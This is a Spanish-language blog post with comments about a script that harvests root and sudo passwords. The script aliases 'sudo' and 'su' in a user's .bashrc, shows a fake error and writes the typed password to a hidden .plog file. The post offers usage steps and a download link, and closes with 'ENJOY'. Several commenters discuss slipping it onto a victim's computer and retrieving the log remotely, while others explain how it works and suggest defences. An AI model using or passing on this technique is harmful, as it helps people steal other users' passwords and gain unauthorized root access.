Conseguir la contraseña del ROOT

Me he encontrado con un Script que cambiar el .bashrc creando un alias para “sudo” y “su”. no antes sin hacer un backup del archivo para posteriormente restaurarlo.

Lo que hace es que envía un mensaje de error cuando se usa “sudo” o “su” y captura la contraseña en un log llamado  “.plog” que está en el home.

Modo de uso

  1. Guarda el script
  2. Darle permisos de ejecución.
  3. Ejecutarlo en la terminal
  4. Cierra la terminal
  5. Esperar.
  6. Después revisa el archivo .plog. Y allí debe estar la contraseña del root o de algún usuario que esté en el sudoers.

http://paste.desdelinux.net/4691

 

ENJOY.

 


29 comentarios

  1.   Lolo dijo

    Pregunta inocente:

    ¿Cómo hace el script para cambiar el .bashrc de un usuario sudoer que no sea uno mismo?

  2.   Blaire Pascal dijo

    O.o me gusta mucho. Probando.

  3.   pacoeloyo dijo

    Entonces la seguridad y la encriptacion que usamos en gnu/linux no valen para nada? yo creo que eso no es así, el que pruebe esto que comente los resultados. Desde que uso este sistema he leído que los niveles de encriptación en linux son muy altos Las contraseñas están cifradas usando algoritmos de reducción criptográfica unidireccional y ahora resulta que con un simple script se salta esa encriptacion. Lo siento pero no me lo creo.

    1.    @Jlcmux dijo

      Si funciona, Mira. Lo que pasa es que el script crea un alias en el .bashrc con sudo y su. Y cuando escribes su y/o sudo. el lee primero el alias. no el comando como tal. entonces cuando escribes la contraseña el la pone en un archivo de texto normal. y luego borra el alias y te deja usar el sudo o su común y corriente. Osea es como un pishing. No es que evada la encriptacion. sino que es un login falso.

      1.    pacoeloyo dijo

        Vale ahora si lo entiendo, ya me extrañaba a mi se se saltara esa protección a la torrera.. Gracias por aclarármelo.

        1.    kikee dijo

          Claro, pero queda lo mas dificil, conseguir colar el script en el PC de la victima, conseguir que se ejecute y luego recoger el archivo remotamente o que se envie a algun correo. Ahí cada uno tendrá que usar la imaginación!

    2.    eVeR dijo

      Exageraste mucho pacoeloyo, me parece. Esto es un simple troyano, que requiere que un usuario salte varias medidas de seguridad y presencia local del atacante. Eso existe en cualquier SO.
      Con respecto al script… si no me equivoco la mayoría de SUDOs actuales autentican con la contraseña del usuario, no del root. Así que la contraseña que se conseguiría es la del usuario (presente en el sudoers).
      Saludos

      1.    diazepan dijo

        si se invoca el “su” a secas, se accede a la cuenta de root.

      2.    @Jlcmux dijo

        es con sudo o su. Además su un usuario puede usar sudo es porque esta en sudoers y tiene los mismo privilegios que un root.. o no?

        1.    eVeR dijo

          no siempre, depende la configuración del sudoers. De todos modos, lo mas común es que si, tenga acceso total.
          El tema es que las acciones ejecutadas usando sudo se suelen registrar

  4.   v3on dijo

    por esto chicos, es que no debe descuidarse la seguridad física de nuestro equipo

    1.    truko22 dijo

      Así es, si se presta por un momentos la pc hay que revisar los alias 😀

  5.   ps dijo

    Esto es muy peligroso si usais contraseñas buenas en entornos de clase o talleres compartidos. Os la pueden jugar. Bueno, os la pudieron haber jugado…

    No es util para ponerse a descubrir las contraseñas de un desconocido, pero creo que a la de un conocido ya es bastante.

    Y recordar, la mayoría duplica sus contraseña o usa patrones comunes. Nunca las subestimeis. Si sois muy cabroncetes claro…

  6.   Ghermain dijo

    Bueno yo no me hago lío… no tengo nada para esconder ni siquiera las preguntas de los exámenes finales… y si necesito una contraseña la pregunto… y sobre mis archivos los tengo en un disco duro externo… con respaldo en mi laptop que se queda en casa.
    Hay que buscar la sencillez y la practicidad, hoy estoy vivo mañana no se… vivo el hoy el resto son horas extras.

  7.   ferchometal dijo

    lo tendre en cuenta, gracias.

  8.   Elynx dijo

    Interesante!

  9.   Lolo dijo

    ¿Cómo hace este script para copiarse en el .bashrc del usuario sudoer?

    Si tienes cuenta en el equipo no puedes entrar en el home de otro usuario al menos que tengas permiso y aún así dudo que puedas modificar el .bashrc de la victima.

    Dudo mucho que funcione al menos que el usuario sudoer sea extremadamente descuidado.

  10.   Lex Aleksandre dijo

    Tenemos que tener mucho cuidado con este tiempo!

  11.   Marcos dijo

    Una duda, si ni tengo la clave de root, cómo puedo darle permiso de ejecución al archivo? O un usuario normal sirve?

    1.    @Jlcmux dijo

      Claro. Los permisos de ejecución no son exclusivos del root.

      1.    Alberto Aru dijo

        ¡AYUDA!
        después de probarlo, he borrado .sudo_sd y no encuentro nada en google (ni otros buscadores)

        1.    Alberto Aru dijo

          borré el .plog y se me borró automáticamente .sudo_sd y no puedo loguearme como root

          1.    Alberto Aru dijo

            ARREGLADO COMENTANDO EL ALIAS

  12.   Taronjeta dijo

    Si esto funciona en un MAC, iré a trolear una tienda Apple… hey! pero sólo un poco, no en plan terrorista 😉

  13.   Atheyus dijo

    Interesante entrada

    Una duda

    Y si uso gksu o el equivalente en kde

    Tambien captura el password

    Saludos

  14.   cascovida dijo

    La ejecución de este script se puede evitar dando permiso de sólo lectura a .bashrc

  15.   Blazek dijo

    Probado, funciona, aunk tiene sus limitaciones. Siempre se aprende cosas nuevas en Linux.

  16.   Alberto Aru dijo

    ¿Cómo puedo revertir los cambios una vez hecho? he borrado .plog y no me deja usar sudo:
    bash: /home/alberto/.sudo_sd: No existe el fichero o el directorio

    1.    Alberto Aru dijo

      ARREGLADO COMENTANDO EL ALIAS

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *